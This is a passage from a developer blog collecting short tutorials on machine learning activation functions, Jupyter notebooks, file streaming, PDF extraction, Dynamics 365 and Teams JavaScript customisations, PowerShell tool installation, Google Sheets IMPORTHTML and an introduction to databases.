" MicromOne

Pagine

Focus on Activation functions

Activation functions are a fascinating area of research in machine learning. They are a special class of mathematical functions characterized by several important properties. First of all, activation functions are usually non-linear. If all activation functions were linear, the entire neural network would collapse into a simple linear model, losing its expressive power.

Another key requirement is differentiability. Ideally, an activation function should be continuously differentiable, meaning it has a derivative everywhere. There is, however, one very popular activation function that is differentiable almost everywhere rather than everywhere.

Activation functions should also be monotonic, meaning that as the input increases, the output never decreases. In other words, when moving from left to right along the x-axis, the value of the function does not go down. Many commonly used activation functions satisfy this property.

A further important characteristic is that the activation function should approximate the identity function near the origin. This ensures that, around zero, the input is passed through without significant distortion.

Let us now look at some of the most common activation functions.

The most widely used activation function is the ReLU (Rectified Linear Unit). In many neural networks, ReLU is the default choice for hidden layers because it performs very well in practice and makes gradient computation efficient. However, ReLU lacks one of the desirable properties mentioned earlier: it is not differentiable at zero.

To address this limitation, the Leaky ReLU was introduced. Instead of outputting zero for negative inputs, Leaky ReLU outputs a small fraction of the input, allowing gradients to flow even for negative values.

In older research papers, the sigmoid activation function is frequently encountered. Sigmoid has some appealing properties: it smoothly maps inputs to values between 0 and 1 and has an easily computable derivative. However, in practice, neural networks trained with sigmoid tend to perform worse than those using ReLU, which is why sigmoid is rarely used in hidden layers today.

Another commonly used activation function is the hyperbolic tangent (tanh). Like sigmoid, tanh is bounded, but its outputs range from −1 to 1. One of its advantages is that it is centered at zero and has larger derivatives than sigmoid, making it a better choice in many cases.

There is also the step function, which is encountered in the perceptron model. While simple, it is not suitable for gradient-based learning.

Finally, in more advanced research, more esoteric activation functions may be encountered, such as the Gaussian Error Linear Unit (GELU). GELU has been adopted in several transformer-based models, including OpenAI’s GPT-3.



How to Add a Table of Contents to Your Jupyter Notebook

Working inside Jupyter notebooks is one of the most popular ways to write and share code, especially in data science, machine learning, and research workflows. As notebooks grow in length and complexity, navigating them can become frustrating. This is where a Table of Contents becomes extremely useful.

In this article, we’ll look at why a Table of Contents matters, how to create one manually, how anchors work in Jupyter, and how modern tools can generate a TOC automatically.

Why Your Notebook Needs a Table of Contents

Long notebooks with multiple sections such as data loading, preprocessing, analysis, and visualization are hard to navigate by scrolling alone. A Table of Contents helps by:

  • Improving navigation

  • Making the structure of the notebook clear

  • Enhancing readability for collaborators

  • Providing a quick overview of the workflow

This is particularly helpful when sharing notebooks or exporting them to HTML or PDF.

Creating a Manual Table of Contents with Markdown

One simple way to create a Table of Contents is by using Markdown links that point to section headers.

Example:

### Table of Contents

1. [Introduction](#introduction)
2. [Load Data](#load-data)
3. [Exploratory Analysis](#exploratory-data-analysis)
4. [Results](#results)
5. [Conclusion](#conclusion)

Each link refers to a specific section inside the notebook.

How Section Anchors Work in Jupyter Notebooks

In Jupyter notebooks, you usually do not need to manually define anchors using HTML. When you create a Markdown heading, Jupyter automatically generates an anchor for it.

Example:

## Introduction

Jupyter automatically creates the anchor:

#introduction

This means you can link to that section using:

[Introduction](#introduction)

Automatic Anchor Naming Rules

Jupyter follows these rules when creating anchors from headings:

  • All characters are converted to lowercase

  • Spaces are replaced with hyphens

  • Special characters are removed

Example:

## Exploratory Data Analysis

Generated anchor:

#exploratory-data-analysis

Link reference:

[Exploratory Analysis](#exploratory-data-analysis)

When to Use <a id=""></a> Manually

In most cases, Markdown headings are enough. However, manually defining an anchor using HTML can be useful in advanced scenarios, such as:

  • When you want a custom anchor name

  • When linking to a specific point that is not a heading

  • When you have duplicate section titles

Example:

<a id="custom-anchor"></a>
### My Section Title

You can then reference it like this:

[Go to section](#custom-anchor)

Automatic Table of Contents Options

If you prefer automation, there are powerful tools available.

Jupyter Notebook Extensions

The Table of Contents (2) extension from jupyter_contrib_nbextensions automatically generates a navigation panel based on notebook headings. It supports automatic updates, collapsible sections, and sidebar display.

JupyterLab Built-in Table of Contents

JupyterLab includes a built-in Table of Contents panel in the sidebar. It reads Markdown headers and allows quick navigation without installing additional extensions.


Real Video Streaming: Why Base64 Fails and How to Do It Properly

If you’ve ever been told, “You can just send video in Base64 inside JSON,” stop right there. Base64 works for small images, debugging, or prototypes, but for serious video—especially live or large files—it’s a disaster: +33% bandwidth, extra CPU, higher latency, wasted memory. No exceptions.

Here’s how real streaming works, with raw bytes, chunking, and codecs, plus a practical WebSocket example.

Why Base64 Doesn’t Work

Base64 introduces serious overhead:

  • Bandwidth: +33% compared to raw binary

  • CPU: Encoding/decoding is expensive

  • Latency: Every chunk must be converted

  • Memory: Extra buffers for the string

  • Scalability: Impossible for live or large files

Base64 is only useful for tiny assets or debugging, never production.

How Real Streaming Works

1. Raw Binary Stream

Send the video as pure bytes, never text. Options include:

  • TCP / UDP

  • WebSocket (binary)

  • HTTP chunked transfer

  • QUIC

2. Chunking

Break the video into blocks:

[chunk][chunk][chunk]
  • Typical size: 1–64 KB

  • Sequential order

  • No text encoding

3. Codec

You don’t send raw frames; codecs compress video efficiently:

  • H.264 / AVC (standard)

  • H.265 / HEVC (high efficiency)

  • VP9 / AV1 (open source, high quality per bandwidth)

The server sends compressed bytes, the client decodes them in real time.

Conceptual Example

Server (encoder):

Camera → H.264 encoder → byte stream → socket

Client (decoder):

socket → byte stream → decoder → frame → display

Web Options



WebRTCLive, low latency
HLSOn-demand streaming
DASHAdaptive streaming
WebSocket (binary)Custom real-time prototypes

Minimal WebSocket Example (JS)

Server Node.js:

videoChunks.forEach(chunk => {
  ws.send(chunk); // Pure binary, no strings
});

Client Browser:

const socket = new WebSocket("wss://example.com/video");
socket.binaryType = "arraybuffer";

socket.onmessage = (event) => {
  const chunk = new Uint8Array(event.data);
  // Decode using MediaSource or WebCodecs
};

Notice: no Base64, only raw bytes.

Real Pipeline with FFmpeg (Conceptual)

ffmpeg -i input.mp4 \
       -c:v libx264 -preset ultrafast -f mpegts udp://127.0.0.1:1234
  • libx264 → codec

  • -f mpegts → streaming-friendly container

  • udp:// → raw stream transmission

The client receives packets and feeds them directly into the decoder.

Base64 is fine for prototypes. For large files or live streaming, you need pure binary, chunking, codecs, and a proper protocol. With WebRTC, HLS, DASH, or binary WebSocket, you get low latency, high quality, and real scalability.

In a follow-up, I can show a full demo:

  • Convert a photo/video into a raw byte stream

  • Simulate frame → chunk → stream

  • Build a real WebRTC + FFmpeg production-ready pipeline

This is the serious world of video streaming. 

Why Base64 Is Killing Your App’s Performance (And What to Use Instead)


The Hidden Cost of Base64

Base64 was never designed for data storage or high-volume file transfers.
Its original purpose was to move binary data through systems that only understood plain text.

When you use it for large payloads today, you end up paying three major taxes.

1. The 33% Size Tax

Base64 encodes every 3 bytes of binary data as 4 ASCII characters.
The result is a ~33% increase in size, every single time.

A 100 MB video suddenly becomes 133 MB of text:

  • more bandwidth consumed

  • more time spent uploading

  • more storage wasted

All for zero functional benefit.

2. The Memory Bottleneck

Most Base64 encoders and decoders require the entire payload to be loaded into memory.

That means a 500 MB upload can easily cause:

  • 1 GB RAM spikes

  • garbage collection pressure

  • process crashes under load

One large request can bring an otherwise healthy server to its knees.

3. The CPU Overhead

Encoding and decoding Base64 is not free.

Your CPU must:

  • parse large strings

  • convert them back to binary

  • allocate new buffers

All of this adds latency, increases response times, and reduces overall throughput—especially under concurrent load.

3 Better Alternatives for Large Files

If you’re building a scalable, production-grade system, stop treating files as strings.
Modern architectures are binary-first.

Here are three proven approaches.

1. The Cloud-Direct Pattern (Presigned URLs)

Your API should not be a middleman for raw bytes.

Instead of:

Client → API → Object Storage

Use presigned URLs.

How it works
The client asks your API for permission.
Your API returns a short-lived, secure upload URL from providers like AWS S3 or Google Cloud Storage.
The client uploads the file directly to the cloud.

Why it wins

  • Zero file data touches your server

  • No memory spikes

  • No CPU overhead

  • Massive scalability for free

Your backend stays fast and boring. Exactly how it should be.

II. Chunked & Resumable Uploads (TUS Protocol)

Uploading a 2 GB file in a single request is a gamble.

If the connection drops at 99%, the user starts over—and hates you for it.

How it works
Split the file into small chunks (e.g. 5 MB).
Upload them sequentially using a resumable protocol like TUS.

Why it wins

  • Fault-tolerant by design

  • Uploads can resume after failures

  • Ideal for unstable networks and large files

This is the standard for serious upload workflows.3. Binary Streaming

Sometimes you do need the file on your server—virus scanning, media processing, transformations.

In that case, stream it.

How it works
Use multipart/form-data and process the incoming request as a stream.
Pipe the data chunk-by-chunk directly to disk, cloud storage, or a processing pipeline.

Why it wins

  • Constant, predictable memory usage

  • Works with arbitrarily large files

  • Plays nicely with backpressure

Streams are how servers are meant to handle data.

Base64 is fine for:

  • small icons

  • tiny blobs

  • email attachments

But for large files, it’s pure technical debt.

If you want faster uploads, lower costs, and servers that don’t fall over when someone uploads a 4K video, move to presigned URLs, chunked uploads, or streaming.


Extracting Tables from PDFs in Python: A Practical Comparison of Tools

Working with PDFs is one of the most common (and frustrating) data engineering tasks. Unlike CSV or Excel files, PDFs are designed for visual presentation, not structured data extraction. Choosing the right Python library can save you hours of cleanup or completely break your pipeline.

In this article, we compare the most popular Python tools for extracting tables and text from PDFs, focusing on accuracy, complexity, and real-world use cases.

Quick Comparison Overview

Different tools shine in different scenarios. Here is a high-level summary before diving deeper:

Tabula-py is best for clean, well-structured tables.
Camelot is excellent for wide and complex layouts.
pdfplumber is flexible and powerful for irregular tables.
PyMuPDF is fast for text extraction but needs extra parsing.
Tesseract OCR is the only option for scanned PDFs.
pdfquery is perfect when exact coordinates are required.

Tabula-py

Type: Text-based
Output: Pandas DataFrame
Complexity: Medium

Tabula-py is a Python wrapper for Tabula (Java-based) and is one of the most popular tools for table extraction.

Pros:

  • Very easy to use

  • Direct output as Pandas DataFrames

  • Great results on clean, grid-based tables

Cons:

  • Struggles with complex layouts

  • Requires Java

Best use case: clean, well-formatted tables with clear borders.

Camelot

Type: Text-based
Output: Pandas DataFrame
Complexity: Medium

Camelot is often considered more accurate than Tabula, especially for wide tables or complex page layouts.

Pros:

  • Excellent precision

  • Handles complex table structures better than Tabula

  • Supports both lattice and stream parsing modes

Cons:

  • Slightly steeper learning curve

  • Can fail on very irregular tables

Best use case: wide tables and complex layouts where precision matters.

pdfplumber

Type: Text-based with parsing
Output: Requires processing
Complexity: Medium–High

pdfplumber offers low-level access to PDF elements and is extremely flexible.

Pros:

  • Highly customizable

  • Excellent for irregular or borderless tables

  • Can extract text, lines, and coordinates

Cons:

  • Requires manual parsing logic

  • More coding effort compared to Tabula or Camelot

Best use case: irregular tables or PDFs where automated tools fail.

PyMuPDF (fitz)

Type: Text-based
Output: Text only
Complexity: Medium

PyMuPDF is fast and efficient but does not natively extract tables.

Pros:

  • Very fast

  • High-quality text extraction

  • Good for preprocessing PDFs

Cons:

  • No built-in table extraction

  • Requires custom parsing

Best use case: fast text extraction when you plan to build your own table parser.

Tesseract OCR

Type: Image-based
Output: Text only
Complexity: High

When PDFs are scanned images, OCR is the only viable solution.

Pros:

  • Works with scanned PDFs

  • Supports multiple languages

Cons:

  • Lower accuracy than text-based tools

  • No table awareness

  • Requires image preprocessing

Best use case: scanned documents with no embedded text.

pdfquery

Type: Text-based
Output: Text with coordinates
Complexity: High

pdfquery is ideal when you need pixel-level control.

Pros:

  • Precise coordinate-based extraction

  • Ideal for fixed-layout documents

  • Powerful for automation

Cons:

  • Complex setup

  • Not beginner-friendly

Best use case: PDFs with consistent layouts where exact positioning matters. 



Detecting Dynamics 365 Web Resource Updates with JavaScript Hashing

When working with Dynamics 365 / Dataverse Web Resources, one common challenge is ensuring users are aware when a JavaScript or HTML Web Resource has been updated. Browser caching can cause users to unknowingly run outdated versions, leading to unexpected behavior and hard-to-diagnose bugs.

In this article, we’ll look at a simple and effective technique to detect Web Resource changes at runtime using JavaScript hashing and notify users when an update is detected.

The Idea

The core idea is straightforward:

  1. Download the Web Resource content

  2. Calculate a hash (SHA-1) of the content

  3. Store the hash in localStorage

  4. Compare the current hash with the previously stored one

  5. Notify the user if the hash has changed

This approach works entirely on the client side and requires no server-side customization.

Triggering the Check on Form Load

The check is executed when a Dynamics 365 form loads:

formContext.data.addOnLoad(
  Opportunity.checkWebResourceHash.bind(this, "opportunity_webresource")
);

This ensures the verification runs automatically whenever the form is opened.

The Hash Comparison Function

Here’s the full implementation of the function responsible for detecting changes:

checkWebResourceHash: async function (webResourceName) {
  const STORAGE_KEY = `WR_HASH_${webResourceName}`;
  const STORAGE_DATE_KEY = `WR_HASH_DATE_${webResourceName}`;

  try {
    const clientUrl = Xrm.Utility.getGlobalContext().getClientUrl();
    const url = `${clientUrl}/WebResources/${webResourceName}`;

    // Fetch the Web Resource content without using cache
    const response = await fetch(url, { cache: "no-store" });
    const text = await response.text();

    // Generate SHA-1 hash
    const encoder = new TextEncoder();
    const data = encoder.encode(text);
    const hashBuffer = await crypto.subtle.digest("SHA-1", data);

    const newHash = Array.from(new Uint8Array(hashBuffer))
      .map(b => b.toString(16).padStart(2, "0"))
      .join("");

    const oldHash = localStorage.getItem(STORAGE_KEY);

    // Detect changes
    if (oldHash && oldHash !== newHash) {
      const now = new Date().toISOString();

      localStorage.setItem(STORAGE_KEY, newHash);
      localStorage.setItem(STORAGE_DATE_KEY, now);

      Xrm.Navigation.openAlertDialog({
        title: "Web Resource Update",
        text:
          `The Web Resource "${webResourceName}" has been updated.\n\n` +
          `Date: ${new Date(now).toLocaleString()}`
      });
    }

    // First-time initialization
    if (!oldHash) {
      localStorage.setItem(STORAGE_KEY, newHash);
      localStorage.setItem(STORAGE_DATE_KEY, new Date().toISOString());
    }

  } catch (e) {
    console.error("Error while checking Web Resource", webResourceName, e);
  }
}

Why SHA-1?

SHA-1 is not recommended for security purposes, but in this scenario it’s perfectly adequate:

  • We’re not securing sensitive data

  • We only need a fast and consistent checksum

  • It’s widely supported by the Web Crypto API

If you prefer, you can easily switch to SHA-256 by replacing "SHA-1" with "SHA-256".

Benefits of This Approach

  • No server-side changes

  • Works with any JavaScript or HTML Web Resource

  • Prevents silent cache-related issues

  • Improves transparency for users and testers

  • Easy to reuse across multiple forms and entities

Possible Enhancements

  • Automatically reload the page after detection

  • Display the last update date in a custom notification

  • Store hashes per environment (Dev / Test / Prod)

  • Extend the logic to multiple Web Resources at once



How to Enable Developer Tools in the New Microsoft Teams Desktop App

If you’re a developer or power user, there may be times when you need access to developer tools in Microsoft Teams. These tools are useful for inspecting elements, debugging custom apps, or troubleshooting layout issues. In the new Microsoft Teams desktop client, however, developer tools are hidden by default. Fortunately, there is a simple workaround to enable them.

Why Developer Tools Are Useful

In the web version of Microsoft Teams, opening developer tools is easy using F12 on Windows or Command + Option + I on macOS. These tools allow you to inspect HTML and CSS, view console logs, and debug issues. In the new desktop client, this functionality is not exposed in the interface, which can be frustrating for developers.

Below is a step-by-step guide to enabling developer tools in the new Teams client.

Step 1 – Create the Configuration File

Start by opening a plain text editor such as Notepad or Visual Studio Code. Create a new file and name it configuration.json. Inside the file, add the following content:

{
  "core/devMenuEnabled": true
}

Save the file to the following location on your Windows machine:

%LOCALAPPDATA%\Packages\MSTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams

This folder is part of the local cache used by the new Microsoft Teams client.

Step – Fully Close Microsoft Teams

Make sure Microsoft Teams is completely closed. Simply closing the window is not enough. Look for the Teams icon in the system tray, right-click it, and select “Quit”. Once the application is fully closed, reopen Microsoft Teams.

Step – Open Developer Tools

After restarting Teams, right-click the Teams icon in the system tray again. You should now see a new option called “Engineering Tools”. From there, select “Open Dev Tools”.

A separate Developer Tools window will open, allowing you to inspect elements, view logs, and debug just like you would in a web browser.

Additional Notes

You may be asked to sign out and sign back in after enabling developer tools. This behavior is normal. Keep in mind that this feature is not officially documented by Microsoft and may change in future updates, but it is very useful for debugging custom Teams applications and extensions.

Even though the new Microsoft Teams client hides developer tools by default, enabling them is quick and easy with this configuration file trick. Once activated, you gain powerful debugging capabilities that can greatly improve your development and troubleshooting workflow.

Detecting Microsoft Teams Context in Dynamics 365 Using JavaScript

When working with Dynamics 365 or Power Apps embedded inside Microsoft Teams, developers often need to understand where the application is actually running.

Is it opened directly in a browser?
Is it hosted inside Microsoft Teams?
Is it loaded inside an iframe?

This article explains why window.location.href can be misleading in Teams integrations and how to detect the execution context reliably using JavaScript.

The Problem: URL Confusion in Microsoft Teams

When a Dynamics 365 app is opened inside Microsoft Teams, it is wrapped in multiple layers:

  • Microsoft Teams shell

  • Power Apps web player

  • Dynamics 365 Unified Interface (UCI)

  • Your page, usually inside an iframe

Because of this architecture, checking the URL with JavaScript like this:

const url = window.location.href;
console.log(url);

can return very different results depending on where the script runs.

Common URL Results You May Encounter

When Dynamics 365 is embedded in Teams, the URL often looks like this:

https://org.crm4.dynamics.com/uclient/main.htm?...&source=teamstab

When Dynamics 365 is opened directly in a browser, the URL may look like:

https://org.crm4.dynamics.com/main.aspx?appid=...

If the code is executed at the Teams shell level, the URL may simply be:

https://teams.microsoft.com/v2

This inconsistency makes it difficult to determine whether the app is actually running inside Microsoft Teams.

Using parent.window.location.href

If your JavaScript runs inside an iframe, you might try accessing the parent window:

const url = parent.window.location.href;
console.log(url);

In Microsoft Teams, this often still resolves to:

https://teams.microsoft.com/v2

This behavior is expected because Teams heavily sandboxes embedded content and hides the real navigation context for security reasons.

The Key Indicator: source=teamstab

In Dynamics 365, one of the most reliable indicators that the app is opened inside Microsoft Teams is the presence of the query parameter:

source=teamstab

If this parameter exists in the URL, the app was launched from a Microsoft Teams tab.

Example:

https://org.crm4.dynamics.com/uclient/main.htm?...&source=teamstab

Practical Detection Example

The following JavaScript example shows a defensive approach to detect whether the app is running outside Microsoft Teams:

const url = new URL(parent.window.location.href);

if (
  !url.toString().includes("source=teams") &&
  !url.toString().includes("teamstab")
) {
  console.log("Running outside Microsoft Teams");
} else {
  console.log("Running inside Microsoft Teams");
}

This logic works well for Dynamics 365 JavaScript customizations, web resources, embedded Power Apps, and model-driven app extensions.

Best Practices and Considerations

Avoid relying only on window.location, because in embedded scenarios it often reflects only the iframe URL.

Expect strong isolation when running inside Teams. Access to parent and top window objects may be restricted or normalized.

When available, use official APIs such as the Microsoft Teams JavaScript SDK or Power Apps context APIs. These provide explicit context information instead of relying on URL parsing.


Dynamically Loading an External Library in a Dynamics 365 Web Resource

When working with Microsoft Dynamics 365 / Dataverse, JavaScript web resources are a powerful way to extend form behavior. However, loading large third‑party libraries (like Excel parsers, charting tools, or PDF generators) directly in every context is not always ideal.

In this article, we’ll look at a clean and safe approach to dynamically loading an external JavaScript library only when it’s needed — using a real‑world example with SheetJS.

Why Load Libraries Dynamically?

There are several reasons to avoid bundling or always loading external libraries:

  • Performance – Large libraries slow down form load times

  • Context awareness – Some clients (like Microsoft Teams) have limitations

  • Reusability – Load the library only when required

  • Maintainability – Easily update the CDN version without redeploying web resources

Dynamic loading solves all of these problems.

The Scenario

We want to:

  • Execute code on form OnLoad

  • Detect the current client (Web, Outlook, Teams)

  • Load SheetJS (xlsx) only if the form is not running inside Microsoft Teams

The OnLoad Function

Here is the full JavaScript example used in a Dynamics 365 form web resource:

OnLoad: function (executionContext) {
    var formContext = executionContext.getFormContext();

    var client = Xrm.Utility
        .getGlobalContext()
        .client
        .getClient();

    if (client !== "Mobile") {
        var script = document.createElement("script");
        script.src = "https://cdn.sheetjs.com/xlsx-latest/package/dist/xlsx.full.min.js";
        script.async = true;
        script.defer = true;
        script.onload = function () {
            console.log("SheetJS library loaded successfully");
        };
        document.head.appendChild(script);
    }
}

Step‑by‑Step Breakdown

1. Access the Form Context

var formContext = executionContext.getFormContext();

This is the recommended approach for interacting with the form in modern Dynamics 365.

2. Detect the Client Type

var client = Xrm.Utility.getGlobalContext().client.getClient();

Possible values include:

  • Web

  • Mobile

  • ... 

This allows us to apply conditional logic depending on where the form is running.

3. Create the Script Element

var script = document.createElement("script");

This uses the browser’s native DOM API to inject JavaScript dynamically.

4. Load the Library from a CDN

script.src = "https://cdn.sheetjs.com/xlsx-latest/package/dist/xlsx.full.min.js";

Using a CDN ensures:

  • Faster load times

  • Automatic version updates

  • Reduced web resource size

5. Handle the Load Event

script.onload = function () {
    console.log("SheetJS library loaded successfully");
};

This guarantees that your code only executes after the library is fully available.

6. Append to the Document Head

document.head.appendChild(script);

At this point, the browser downloads and executes the external library.

Best Practices

  • Always check the client context

  • Load libraries only when necessary

  • Use onload callbacks for dependent logic

  • Avoid blocking scripts on form load

  • Don’t assume availability in Teams or Mobile clients

When Should You Use This Pattern?

Dynamic loading is ideal when:

  • Exporting data to Excel

  • Generating documents

  • Using visualization libraries

  • Adding advanced parsing or calculation logic


PowerCRM SideKick 365: A Must-Have Chrome Extension for Dynamics 365 Professionals

If you work daily with Microsoft Dynamics 365, you know how time-consuming it can be to debug forms, inspect fields, test records, or navigate between system components. PowerCRM SideKick 365 is a Chrome extension designed to significantly improve productivity for developers, testers, and functional consultants.

Download the extension here:
https://chromewebstore.google.com/detail/powercrm-sidekick-365/fjpbmdkkpoioonhibabipdbcohkcdccd

What is PowerCRM SideKick 365?

PowerCRM SideKick 365 adds a powerful side panel directly into your browser when working with Dynamics 365. It provides quick access to tools that normally require multiple clicks, advanced configuration, or external utilities.

Key Features

  • Form Tools – Show or hide logical names, enable or disable fields, auto-populate fields with random data

  • Update Records – Update any field on a record, including bulk updates

  • All Attributes Viewer – Instantly display all attributes of the current entity

  • Related Records Explorer – View and navigate all entity relationships

  • User Impersonation – Test behavior by impersonating another user

  • Plugin Trace Log Explorer – Easily read and analyze plugin trace logs

  • Quick Navigation Panel – Jump directly to Solutions, Form Editor, Azure Portal, and more

  • Config Manager – Customize which tools appear on different pages

This extension is especially valuable for debugging, testing, and speeding up repetitive CRM tasks without leaving the Dynamics interface.

Similar Chrome Extensions for Dynamics 365 and Power Platform

If you’re building a complete productivity toolkit for Dynamics 365, here are some excellent alternatives and complementary tools.

Toolshed for Power Platform / Dynamics 365
A command-based toolbox that lets you reveal hidden fields, schema names, record IDs, and run quick updates directly from the UI.

XrmWebTools
A web-based extension offering simplified access to XrmToolBox-like features such as audits, plugin logs, and user insights.

CRM 365 Helper
A lightweight extension focused on fast access to common tasks like retrieving record IDs, opening Advanced Find, workflows, and form metadata.

365 Power Pane
Provides basic form manipulation tools and shortcuts, useful for quick inspections and simple testing scenarios.

Each of these tools addresses slightly different needs, but together they can dramatically reduce development and troubleshooting time.

Security and Best Practices

Chrome extensions often require broad permissions. Before installing any tool in a production or corporate environment, make sure to review requested permissions carefully, check user reviews and update frequency, and align installation with your organization’s IT security policies.

Using trusted tools responsibly ensures productivity gains without compromising data security.

PowerCRM SideKick 365 stands out as one of the most complete Chrome extensions for Dynamics 365 professionals. Its integrated side panel and rich feature set make it a powerful companion for everyday CRM development and testing.

Try it here:
https://chromewebstore.google.com/detail/powercrm-sidekick-365/fjpbmdkkpoioonhibabipdbcohkcdccd

If you’re serious about optimizing your Dynamics 365 workflow, combining this extension with tools like Toolshed and XrmWebTools can turn your browser into a full-featured CRM productivity hub.

How to Download the Plugin Registration Tool for Dynamics 365 Using PowerShell (and Key Risks to Consider)

 

If you work with Dynamics 365 CRM / Dataverse, sooner or later you’ll need the Plugin Registration Tool (PRT). This tool is essential for registering, updating, and managing plugins in your Dynamics environment.
In this article, we’ll see how to download it using PowerShell and highlight some important risks and best practices every developer should be aware of.

Why the Plugin Registration Tool Is Important

Dynamics 365 does not provide a built-in UI for managing plugins. The Plugin Registration Tool allows you to:

  • Register plugin assemblies

  • Add and configure plugin steps

  • Define execution pipelines and filtering attributes

  • Debug and update existing plugin logic

Without this tool, managing plugins becomes nearly impossible in real-world projects.

Downloading the Plugin Registration Tool Using PowerShell

Instead of downloading executables from random sources, the safest approach is to get the tool directly from Microsoft’s official NuGet packages.

Open PowerShell as Administrator

Make sure PowerShell is running with administrator privileges, otherwise some commands may fail.

Download the NuGet executable

Run the following script to download nuget.exe locally:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$sourceNugetExe = "https://dist.nuget.org/win-x86-commandline/latest/nuget.exe"
$targetNugetExe = ".\nuget.exe"
Remove-Item .\Tools -Force -Recurse -ErrorAction Ignore
Invoke-WebRequest $sourceNugetExe -OutFile $targetNugetExe
Set-Alias nuget $targetNugetExe -Scope Global -Verbose

This ensures you are using the latest and secure NuGet client.

Install the Plugin Registration Tool

Now download the Plugin Registration Tool package and extract it into a dedicated folder:

./nuget install Microsoft.CrmSdk.XrmTooling.PluginRegistrationTool -O .\Tools
md .\Tools\PluginRegistration
$prtFolder = Get-ChildItem ./Tools | Where-Object {$_.Name -match 'Microsoft.CrmSdk.XrmTooling.PluginRegistrationTool.'}
move .\Tools\$prtFolder\tools\*.* .\Tools\PluginRegistration
Remove-Item .\Tools\$prtFolder -Force -Recurse

Tool Ready to Use

You’ll now find the executable inside the .\Tools\PluginRegistration folder. From there, you can launch the Plugin Registration Tool and connect to your Dynamics 365 environment.

Risks, Warnings, and Best Practices

Avoid Unofficial Downloads

Downloading the Plugin Registration Tool from unofficial websites or shared ZIP files can be risky. These files may contain outdated binaries, modified or malicious code, or incompatible versions that break your environment.
Always prefer PowerShell with NuGet or other Microsoft-supported methods.

Version Compatibility Issues

Using an outdated or incompatible version of the Plugin Registration Tool can lead to connection and authentication errors, failed plugin registrations, unexpected behavior when updating assemblies, or missing and corrupted plugin steps.
This is especially critical when working across different Dynamics 365 or Dataverse versions.

Recommended Best Practices

  • Always test plugin changes in a development or sandbox environment

  • Use source control systems such as Git or Azure DevOps

  • Version your plugin assemblies properly

  • Back up existing plugin registrations before making changes

  • Consider modern tooling like Power Platform CLI (pac tool) for better ALM integration


What If Eyes Evolved Differently? Inside MIT’s New AI Vision Evolution Project


What if we could replay evolution and explore how eyes might have developed under different environmental pressures? That’s exactly what a team of researchers from MIT, Rice University, and Lund University set out to do with their groundbreaking “What if Eye…?” project — a computational framework that recreates vision evolution inside a virtual world. (eyes.mit.edu)

A Digital Sandbox for Evolution

Instead of waiting millions of years, this project places embodied AI agents — digital creatures inside simulated physics environments — through artificial evolution. They start with a basic light-sensing cell and, over many generations, their visual systems and behaviors evolve in response to survival challenges. The key idea is to let vision emerge naturally from interaction with the environment rather than being manually designed with fixed datasets or human bias. (eyes.mit.edu)

Different Tasks Lead to Different Eyes

The researchers posed “what-if” scenarios by assigning specific tasks to these agents:

  • Navigation tasks, like moving through a maze, favor eyes that cover a wide field with many simple sensors — similar to compound eyes seen in insects.

  • Detection tasks, such as distinguishing food from poison, drive the evolution of high-resolution, camera-like eyes with a focused forward gaze. (eyes.mit.edu)

This shows that the function of vision directly influences the type of visual system that evolves. (eyes.mit.edu)

Optics Emerge Naturally

One of the most fascinating outcomes is how optical features like lenses emerge in the simulations. When the artificial evolutionary system was allowed to evolve optical genes, it developed lens-like structures — not because they were programmed in, but because they offered a functional advantage. Lenses helped agents overcome the basic trade-off between collecting enough light and maintaining detailed spatial vision. (eyes.mit.edu)

Scaling Brains and Vision Together

The research also found that simply increasing the size of an agent’s “brain” didn’t always make it better at visual tasks. Improvements came only when neural processing and visual acuity scaled together — revealing a close link between sensory input quality and cognitive processing capacity. (eyes.mit.edu)

Beyond Biology — Designing Better Vision Systems

This computational approach doesn’t just help us understand how natural vision might have evolved differently; it also points toward new ways to design artificial vision systems. By treating embodied AI as a “hypothesis-testing machine,” the project lays the foundation for creating bio-inspired sensors and cameras that are optimized for specific tasks, from robotics and drones to wearable devices. (eyes.mit.edu)

How to Import Wikipedia Tables into Google Sheets Using IMPORTHTML

Google Sheets offers a powerful yet simple way to import data directly from the web. One of the most useful functions for this purpose is IMPORTHTML, which allows you to extract tables and lists from web pages such as Wikipedia. In this article, we’ll look at how to use this function step by step, with a practical example.

What Is the IMPORTHTML Function?

The IMPORTHTML function in Google Sheets lets you pull structured data from a webpage and display it automatically in your spreadsheet. This is especially helpful when working with public datasets, statistics, or frequently updated information.

The basic syntax is:

=IMPORTHTML("URL", "table", index)
  • URL – The web page you want to extract data from

  • "table" or "list" – The type of data you want to import

  • index – The number of the table or list on that page

Example: Importing Demographic Data from Wikipedia

Let’s say you want to import demographic data from Wikipedia into Google Sheets. For example, data from the Demographics of India page.

You can use the following formula:

=IMPORTHTML("http://en.wikipedia.org/wiki/Demographics_of_India", "table", 4)

This formula tells Google Sheets to:

  • Visit the Wikipedia page

  • Look for tables on the page

  • Import the fourth table it finds

Once you press Enter, Google Sheets will automatically load the data into your spreadsheet.

Why Use IMPORTHTML?

Here are a few key benefits:

  • Automatic updates – When the source page changes, your data updates too

  • No manual copy-paste – Saves time and reduces errors

  • Perfect for analysis – Ideal for charts, reports, and dashboards

  • Beginner-friendly – No coding skills required

Tips for Better Results

  • If the imported table isn’t the one you want, try changing the index number

  • Make sure the webpage is public and not blocked

  • Use additional Google Sheets functions (like QUERY, FILTER, or SORT) to clean and analyze the imported data

The IMPORTHTML function is an excellent tool for bloggers, researchers, students, and analysts who want to work with live web data. With just one formula, you can transform publicly available information into a dynamic and useful spreadsheet.

SQLAlchemy Data wrangling

When working with data, especially at scale, spreadsheets can quickly reach their limits. This is where databases come in.

A database is an organized collection of structured data designed to make data storage, retrieval, modification, and deletion efficient and reliable. Databases are a foundational tool in data analysis, data engineering, and software development.

Why use databases for data wrangling?

Databases offer several key advantages when handling data. They are fast and optimized for performance, even when working with large datasets. They provide administrative features such as access controls, which help protect sensitive information. They also enforce data integrity rules, ensuring that data is entered in the correct format, which is essential for reliable data wrangling.

Types of databases

Databases generally fall into two main categories: relational and non-relational. Relational databases are the most popular and widely used.

Relational databases organize data into tables made up of rows and columns, similar to Excel spreadsheets, but with stricter rules. Each column must have a unique name, all values in a column must share the same data type, and using clear, descriptive column names is considered best practice.

Common examples of relational databases include SQLite, PostgreSQL, MySQL, and SQL Server.

Non-relational databases, often referred to as NoSQL databases, are designed for more flexible or unstructured data, such as documents or key-value pairs. While powerful, they are outside the scope of this introduction.

What is SQL?

